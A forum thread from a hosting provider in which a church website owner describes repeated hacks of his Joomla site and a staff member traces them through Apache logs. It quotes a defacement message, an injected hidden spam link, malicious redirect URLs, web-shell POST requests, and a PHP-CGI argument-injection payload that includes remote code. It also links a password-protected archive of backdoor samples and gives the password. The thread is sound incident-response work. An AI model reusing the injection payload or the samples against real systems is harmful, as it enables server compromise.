Побажання та пропозиції. Помощь с нахождением причины взлома в логах

EparhiaNik
11 років
0
Здравствуйте.
Сайт несколько раз ломали, информацию о всех случаях сохранял. Может ли кто-то из специалистов хостинга по этим данным и логам сервера определить пути взлома?
rudenko
11 років
0
Смотря какую информацию вы сохраняли и что подразумевается под ломали. Напишите подробную информацию, поможем чем сможем.
EparhiaNik
11 років
0
Куда писать?
rudenko
11 років
0
На форуме можете писать, если там нет Ваших паролей. Другим тоже будет интересно как искать уязвимости.
EparhiaNik
11 років
0
Ломали=получали доступ на сайт, записывали и изменяли файлы.

Файлы прилагаются в архиве. На архиве пароль - '1240', а то открытый архив антивирусы не пропускают. Кстати, раньше касперский в этих php вирусов не замечал, а теперь замечает. Пишет на них "Backdoor.PHP.PhpShell.dl" и удаляет с диска.

Случаи взлома сайта:
1) 11.08.2011
При входе на сайт отображалась страничка Hacked by Number 7 ~ Tunisian Hacke

Текст был такой:
---------------------------------------------------
Your Web Site Got Hacked By A tunisian Hacker called "Number 7"<br>
Hacked by Number 7<br>
You have No Security <br>
you must secure your web site<br>
for more security, contact : <br>
an.7@live.fr <br>
Greetz: # Tunisian Hackers<br>

Решение проблемы: Просто восстанавил сайт из бэкапа.

На наш сайт пару раз записывались вредоносные *.php, которые находил антивирус хостинга.

2) 11.12.2012

Записаны вредоносные *.php. Письмо от хостинга:
-------------------------------------------------
Вы получили это письмо как владелец хостинг-аккаунта eparhia. В результате проверки аккаунта антивирусом были обнаружены файлы, которые являются вредоносными или заражены.
Результаты поиска вредоносных файлов
Чаще всего наличие таких файлов свидетельствует о получении доступа к сайту злоумышленником с целью рассылки спама, осуществления атак на другие сайты и размещения фишинговых страниц. Список обнаруженных вредоносных файлов:
eparhia.mk.ua/2011-2012/images/stories/story.php
eparhia.mk.ua/www/images/stories/bobbi.php
----------------------------------------------------
Вредоносные файлы удалил, но после этого остались посторонние вставки в генерируемые html. (Заметил их только недавно, определил момент появления с помощью сервиса Вебархив
<a href="http://web.archive.org/web/20130316051759/http://www.eparhia.mk.ua/" target="_blank" rel="nofollow">http://web.archive.org/web/201303...</a>
посмотрел до взлома небыло, а после - появилось) :
------------------------------------------------------
<!-- 8c19761b95 --><div style="display:none"><a href="<a href="http://www.nwrpca.org/">payday" target="_blank" rel="nofollow">http://www.nwrpca.org/">...</a> loans</a></div><!-- 8c19761b95 -->
-----------------------------------------------------

3) 29.05.2013
Антивирус хостинга прислал сообщение о вредоносных *.php. Найденные файлы удалил, сохранил сами файлы и дату их модификации.

Начиная с этого времени при просмотре сайта начал выводить собщения Антивирус Каперского:

I)
main Запрещено: HEUR:Trojan.Script.Generic 14.06.2013 13:55:49
<a href="http://blog2.therainbowcloud.com:6842/cb/main.php?papers=408&program=644&sponsor=82&config=164&java=49//" target="_blank" rel="nofollow">http://blog2.therainbowcloud.com:6842/cb/main.ph...</a>

II)
main.php?groupcp=174&sponsor=82&extra=237&deals=791&board=198&profile=133
Запрещено:
<a href="http://blog2.therainbowcloud.com:6842/commercial/files/stonemanor/main.php?groupcp=174&sponsor=82&extra=237&deals=791&board=198&profile=133" target="_blank" rel="nofollow">http://blog2.therainbowcloud.com:6842/commercial...</a> (проверка по базе вредоносных веб-адресов) 14.06.2013 14:35:10
<a href="http://blog2.therainbowcloud.com:6842/commercial/files/stonemanor/" target="_blank" rel="nofollow">http://blog2.therainbowcloud.com:6842/commercial...</a>

III)
main Обнаружено: HEUR:Trojan.Script.Generic 14.06.2013 15:48:18
<a href="http://blog2.kapsol.mobi:6842/cnet/main.php?state=946&sponsor=82&problems=789&stats=48&author=888//" target="_blank" rel="nofollow">http://blog2.kapsol.mobi:6842/cnet/main....</a>

4) 06.06.13
Антивирус хостинга прислал сообщение о вредоносных *.php.
В корневом каталоге файлы: wp-conf.php, wthm6103g

Позже нашел в дирректории «/images»
файл 59e48.php
в корневом каталоге и во всех подкаталогах корневого такие файлы:

index_backup.php
.htaccess - со вставкой вначале подозрительного кода, либо просто с одним подозрительным кодом.
Дата создания файлов — 27.05.2013, антивирус хостинга их не нашел.
Решение: поудалял все подозрительные файлы.

Меры профилактики:
-Обновился до последней версии Джумлы 1.5.26
-Обновил все расширения, ненужные удалил
-Сменил логин админа, запретил доступ в /administrator со всех IP кроме своей подсети
-запретил запись в '/administrator' и 'configuration.php'
-изменил стандартные префиксы таблиц в БД
cdn.adm.tools/forum_message/0185/49/Взломы.zip
rudenko
11 років
0
За старые даты я не удастся посмотреть информацию, так как логов за столь длительный период времени - нет. 27 мая для заливки вирусов использовался существующий на тот момент файл wthm3925g.php Если бы знать когда создан был тот файл, то можно было бы найти как он попал на сервер и так идя по цепочке можно прийти к первоисточнику - запросу к Joomla или ее модулю, который был использован для заливки первого эксплоита. Лучше всего искать источник не удаляя вирусы. Кроме этого нужно сохранять не только дату, но и точное время с секундами.

Вот выдержка из лога Apache:
209.200.227.229 - - [27/May/2013:02:25:26 +0300] "POST /wthm3925g.php?t8904n=1 HTTP/1.0" 200 35372 "-" "Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.15-1.2054_FC5; X11; i686; en_US) KHTML/3.5.4 (like Gecko)"
192.232.224.208 - - [27/May/2013:02:25:28 +0300] "POST /wthm3925g.php?t8904n=1 HTTP/1.0" 200 8278 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
50.87.9.175 - - [27/May/2013:02:25:33 +0300] "POST /wthm3925g.php?t8904n=1 HTTP/1.0" 200 36193 "-" "Lynx/2.8 libwww-FM/2.1 SSL-MM/1.4 GNUTLS/0.8"
31.133.43.73 - - [27/May/2013:13:18:04 +0300] "POST /wthm3925g.php?cookies=1&showimg=1&truecss=1&t2122n=1 HTTP/1.0" 200 1939 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET4.0C; .NET4.0E)"
196.41.137.243 - - [27/May/2013:19:31:52 +0300] "POST /?-n+-dallow_url_include%3DOn+-dauto_prepend_file%3Dbasemen.hk/success.txt HTTP/1.0" 200 33962 "www.eparhia.mk.ua/?-n+-dallow_url_include%3DOn+-dauto_prepend_file%3Dhttp://basemen.hk/success.txt "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.452) Gecko/20041027 Mnenhy/0.6.0.104"
31.133.43.73 - - [27/May/2013:20:24:54 +0300] "POST /wthm3925g.php?t3420n=1&cookies=1&showimg=1&truecss=1&t2122n=1 HTTP/1.0" 200 1123 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET4.0C; .NET4.0E)"
95.134.122.147 - - [27/May/2013:20:50:20 +0300] "POST /photo/category/444-24032013-pravyashhij-arxierej-vozglavil-liturgiyu-i-chin-torzhestva-pravoslaviya.html HTTP/1.0" 200 7711 "eparhia.mk.ua/photo/category/444-24032013-pravyashhij-arxierej-vozglavil-liturgiyu-i-chin-torzhestva-pravoslaviya.html" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.71 Safari/537.17 YE"
217.23.3.13 - - [27/May/2013:23:55:43 +0300] "POST /wthm3925g.php?t8904n=1 HTTP/1.0" 423 86 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
EparhiaNik
11 років
0
/eparhia.mk.ua/www/wthm3925g.php модифицирован 27.05.2013 13:18:04
Думаю что это и есть дата создания
Тема закрита.